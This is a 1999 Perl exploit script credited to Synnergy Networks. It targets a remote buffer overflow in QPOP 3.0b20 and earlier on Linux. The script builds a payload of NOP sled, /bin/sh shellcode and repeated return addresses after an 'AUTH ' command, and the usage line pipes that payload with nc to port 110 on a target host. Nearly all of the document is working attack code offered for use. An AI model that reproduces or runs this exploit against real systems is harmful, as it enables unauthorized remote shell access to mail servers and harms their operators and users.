#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote buffer overflow exploit for QPOP 3.0b<=20 running on Linux.
# (based on code by sk8@lucid-solutions.com)

# * Author:
#
# headflux (hf@synnergy.net)
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Usage:
# ./qpop-linux.pl <offset> | nc -v <hostname> 110

# *** Synnergy Networks

$nop	= "\x90";
$offset	= 0;

$shell	= "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa";
$shell	.= "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04";
$shell	.= "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff";
$shell	.= "\xff\xff/bin/sh";

$i	= 0;
$buflen	= 990;
$ret	= 0xbfffd304;
$cmd	= "AUTH ";

if(defined $ARGV[0])
{
	$offset	= $ARGV[0];
}

$buf = $nop x $buflen;

substr($buf, 0, length($cmd))		= "$cmd";
substr($buf, 800, length($shell))	= "$shell";

for ($i=800+length($shell) + 2; $i < $buflen - 4; $i += 4)
{
	substr($buf, $i, length($ret + offset))	= pack(l,$ret + $offset);
}

# substr($buf, $buflen - 2, 1)	= "\n";
# substr($buf, $buflen - 1, 1)	= "\n";

$buf	.= "\n";

printf STDOUT "$buf\n";

# EOF
#                    www.hack.co.za                #